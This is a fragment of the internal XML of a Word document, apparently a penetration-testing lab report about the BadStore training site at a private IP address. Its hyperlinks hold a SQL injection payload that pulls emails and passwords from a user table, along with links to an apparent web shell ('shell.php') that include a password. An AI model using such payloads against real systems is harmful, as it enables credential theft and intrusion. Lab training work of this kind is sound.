    <w:rsid w:val="00636E69"/>
    <w:rsid w:val="00637AC4"/>
    <w:rsid w:val="00652665"/>
    <w:rsid w:val="006748B7"/>
    <w:rsid w:val="00680ABD"/>
    <w:rsid w:val="006B6F83"/>
    <w:rsid w:val="006E7E92"/>
    <w:rsid w:val="006F7828"/>
    <w:rsid w:val="00756D54"/>
    <w:rsid w:val="007C3255"/>
    <w:rsid w:val="008F4177"/>
    <w:rsid w:val="0090153C"/>
    <w:rsid w:val="0099655A"/>
    <w:rsid w:val="00A426E8"/>
    <w:rsid w:val="00A9335A"/>
    <w:rsid w:val="00AB797C"/>
    <w:rsid w:val="00B326A3"/>
    <w:rsid w:val="00B54F09"/>
    <w:rsid w:val="00B56D63"/>
    <w:rsid w:val="00B9132E"/>
    <w:rsid w:val="00C01CF8"/>
    <w:rsid w:val="00C52AF5"/>
    <w:rsid w:val="00CD432A"/>
    <w:rsid w:val="00CF21DC"/>
    <w:rsid w:val="00CF7447"/>
    <w:rsid w:val="00D21E89"/>
    <w:rsid w:val="00D5155D"/>
    <w:rsid w:val="00F21EF6"/>
    <w:rsid w:val="00F876DC"/>
    <w:rsid w:val="00FA0062"/>
    <w:rsid w:val="00FB0F4C"/>
    <w:rsid w:val="00FB5892"/>
    <w:rsid w:val="00FF7656"/>
    <w:rsid w:val="452CB4D1"/>
    <w:rsid w:val="68AAD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ADDB0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DEDA675D-CE4F-4DD6-8F3C-5033BC7B1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1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569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569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FA00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192.168.16.128/cgi-bin/shell.php%20pass12345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mailto:debbie@supplier.com" TargetMode="Externa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hyperlink" Target="http://192.168.16.128" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.16.128/cgi-bin/badstore.cgi?searchquery=xx'+IN+(itemnum,sdesc,ldesc)+union+select+email,passwd,123,123+from+userdb+LIMIT+2+--+&amp;action=search&amp;x=16&amp;y=7" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.16.128/cgi-bin/shell.php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543</Words>
  <Characters>3099</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>25</Lines>
  <Paragraphs>7</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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Hektor</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Victoria Hektor</cp:lastModifiedBy>
  <cp:revision>62</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-10T16:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-14T16:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>